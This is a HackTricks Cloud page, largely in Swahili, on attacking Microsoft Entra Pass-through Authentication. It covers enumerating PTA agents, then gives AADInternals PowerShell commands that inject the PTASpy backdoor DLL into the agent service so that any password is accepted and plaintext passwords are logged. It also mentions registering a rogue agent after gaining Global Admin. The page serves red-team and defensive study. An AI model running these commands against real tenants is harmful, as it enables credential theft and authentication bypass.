HackTricks CloudAz - PTA - Pass-through Authentication
Reading time: 5 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Basic Information
From the docs: Microsoft Entra pass-through authentication inaruhusu watumiaji wako kuingia kwenye programu za ndani na za wingu kwa kutumia nywila sawa. Kipengele hiki kinawapa watumiaji wako uzoefu bora - nywila moja kidogo ya kukumbuka, na hupunguza gharama za msaada wa IT kwa sababu watumiaji wako wana uwezekano mdogo wa kusahau jinsi ya kuingia. Wakati watumiaji wanaingia kwa kutumia Microsoft Entra ID, kipengele hiki kinathibitisha nywila za watumiaji moja kwa moja dhidi ya Active Directory yako ya ndani.
Katika PTA vitambulisho vinakuwa vimeunganishwa lakini nywila hazijawa kama katika PHS.
Uthibitishaji unathibitishwa katika AD ya ndani na mawasiliano na wingu yanafanywa na wakala wa uthibitishaji anayekimbia katika seva ya ndani (haipaswi kuwa kwenye DC ya ndani).
Authentication flow
.png)
- Ili kuingia mtumiaji anapelekwa kwenye Azure AD, ambapo anatumia jina la mtumiaji na nywila
- Taarifa za kuingia zinakuwa zimefichwa na kuwekwa kwenye foleni katika Azure AD
- Wakala wa uthibitishaji wa ndani anakusanya taarifa za kuingia kutoka kwenye foleni na kuzifungua. Wakala huyu anaitwa "Pass-through authentication agent" au PTA agent.
- Wakala anathibitisha taarifa dhidi ya AD ya ndani na anatumia jibu kurudi kwa Azure AD ambayo, ikiwa jibu ni chanya, inakamilisha kuingia kwa mtumiaji.
warning
Ikiwa mshambuliaji anashambulia PTA anaweza kuona taarifa zote za kuingia kutoka kwenye foleni (katika maandishi wazi).
Anaweza pia kuhakiki taarifa zozote kwa AzureAD (shambulio linalofanana na ufunguo wa Skeleton).
Enumeration
From Entra ID:
az rest --url 'https://graph.microsoft.com/beta/onPremisesPublishingProfiles/authentication/agentGroups?$expand=agents'
# Example response:
{
"@odata.context": "https://graph.microsoft.com/beta/$metadata#onPremisesPublishingProfiles('authentication')/agentGroups(agents())",
"value": [
{
"agents": [
{
"externalIp": "20.121.45.57",
"id": "4a000eb4-9a02-49e4-b67f-f9b101f8f14c",
"machineName": "ConnectSync.hacktricks-con.azure",
"status": "active",
"supportedPublishingTypes": [
"authentication"
]
}
],
"displayName": "Default group for Pass-through Authentication",
"id": "d372d40f-3f81-4824-8b9e-6028182db58e",
"isDefault": true,
"publishingType": "authentication"
}
]
}
Angalia kama wakala anafanya kazi kwenye seva ya ndani:
Get-Service -Name "AzureADConnectAuthenticationAgent"
Pivoting
Ikiwa una admin ufikiaji kwa Azure AD Connect server yenye PTA agent inayoendesha, unaweza kutumia moduli ya AADInternals ku ingiza backdoor ambayo it thibitisha NYWILA ZOTE zilizowekwa (hivyo nywila zote zitakuwa halali kwa uthibitishaji):
Install-Module AADInternals -RequiredVersion 0.9.3
Import-Module AADInternals
Install-AADIntPTASpy # Install the backdoor, it'll save all the passwords in a file
Get-AADIntPTASpyLog -DecodePasswords # Read the file or use this to read the passwords in clear-text
Remove-AADIntPTASpy # Remove the backdoor
note
Ikiwa ufungaji unashindwa, hii inaweza kuwa kutokana na kukosekana kwa Microsoft Visual C++ 2015 Redistributables.
Backdoor hii itafanya:
- Kuunda folda iliyofichwa
C:\PTASpy - Nakala
PTASpy.dllkwenyeC:\PTASpy - Kuingiza
PTASpy.dllkwenye mchakato waAzureADConnectAuthenticationAgentService
note
Wakati huduma ya AzureADConnectAuthenticationAgent inapoanzishwa upya, PTASpy "imeondolewa" na inapaswa kufungwa upya.
caution
Baada ya kupata mamlaka ya GA kwenye wingu, inawezekana kujiandikisha wakala mpya wa PTA na inaweza kurudia hatua za awali ili kujiandikisha kwa kutumia nenosiri lolote na pia, kupata nenosiri katika maandiko wazi.
Seamless SSO
Inawezekana kutumia Seamless SSO na PTA, ambayo inahatarishwa kwa matumizi mengine mabaya. Angalia katika:
Marejeleo
- https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta
- https://aadinternals.com/post/on-prem_admin/#pass-through-authentication
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.